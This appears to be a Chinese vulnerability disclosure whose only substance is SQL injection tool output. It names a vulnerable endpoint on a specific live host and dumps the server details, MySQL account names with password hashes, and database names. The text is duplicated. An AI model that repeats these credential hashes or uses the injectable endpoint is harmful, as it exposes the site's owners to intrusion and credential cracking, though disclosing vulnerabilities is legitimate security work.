### 简要描述: .......... ### 详细说明: ....... ### 漏洞证明: ``` Target: http://t1.fanwe.net:93/t1/index.php?m=Ajax&a=gettypeattr&type_id=123 Host IP:112.124.32.200 Web Server: IIS Powered-by: WAF/2.0 Powered-by: WAF/2.0 DB Server: MySQL Resp. Time(avg):168 ms Current User: root@127.0.0.1 Current DB: t1 Host Name: AY130625141005Z System User: root@127.0.0.1 Installation dir: C:\Program Files\MySQL\MySQL Server 5.1 Compile OS: Win32 Sql Version: 5.1.63-community-log DB User & Pass: root:*F64A79FC5A78EB0E3F0B5D4FCA58030D524522C4:127.0.0.1 51ecshop:*B7EC60CFF920CFA3D9D423924E328D90BB9009AC:127.0.0.1 education:*CD4EAE64C0B40726E8C22412D4BAC402F8CDBD59:127.0.0.1 fanweadmin:*0347D00A9619E28D8BCD4C1D1642DC362BB24C3C:% fanwegame:*54468371D368D02A33062D435E2FCFAE4A6B3947:% eslicense:*B7EC60CFF920CFA3D9D423924E328D90BB9009AC:127.0.0.1 kiss:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9:% fx:*B4AE0DB043FD4B762BE654749D5F6BAC258B71DF:127.0.0.1 kaihao138:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9:%...
### 简要描述: .......... ### 详细说明: ....... ### 漏洞证明: ``` Target: http://t1.fanwe.net:93/t1/index.php?m=Ajax&a=gettypeattr&type_id=123 Host IP:112.124.32.200 Web Server: IIS Powered-by: WAF/2.0 Powered-by: WAF/2.0 DB Server: MySQL Resp. Time(avg):168 ms Current User: root@127.0.0.1 Current DB: t1 Host Name: AY130625141005Z System User: root@127.0.0.1 Installation dir: C:\Program Files\MySQL\MySQL Server 5.1 Compile OS: Win32 Sql Version: 5.1.63-community-log DB User & Pass: root:*F64A79FC5A78EB0E3F0B5D4FCA58030D524522C4:127.0.0.1 51ecshop:*B7EC60CFF920CFA3D9D423924E328D90BB9009AC:127.0.0.1 education:*CD4EAE64C0B40726E8C22412D4BAC402F8CDBD59:127.0.0.1 fanweadmin:*0347D00A9619E28D8BCD4C1D1642DC362BB24C3C:% fanwegame:*54468371D368D02A33062D435E2FCFAE4A6B3947:% eslicense:*B7EC60CFF920CFA3D9D423924E328D90BB9009AC:127.0.0.1 kiss:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9:% fx:*B4AE0DB043FD4B762BE654749D5F6BAC258B71DF:127.0.0.1 kaihao138:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9:% kisshack2010:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9:% gametest:*54468371D368D02A33062D435E2FCFAE4A6B3947:% tianqi:*6011063EC01343A1BFF3D2BD675B1C2709F64696:127.0.0.1 root:*F64A79FC5A78EB0E3F0B5D4FCA58030D524522C4:% fanwetour:*0ADFF7036D3E13A456A7B731E1634838B7083AB1:% Data Bases: information_schema 51ecshop beach castle commlib daikuang daohang dingcan draw ecgbk ecshop273 education educationnew en escount fanwejx fanwetour fsgame game gametest huihoo localhost lyo2o m1 m15 m17 m18 m19 m2 m20 m21 m22 meishuihu meishuihulogin moyan mysql o2o o2o3 o2os rootkissdb share t1 test tianqi tw ultrax uu43share yhdz yhnew youhui zc14 zuilv ```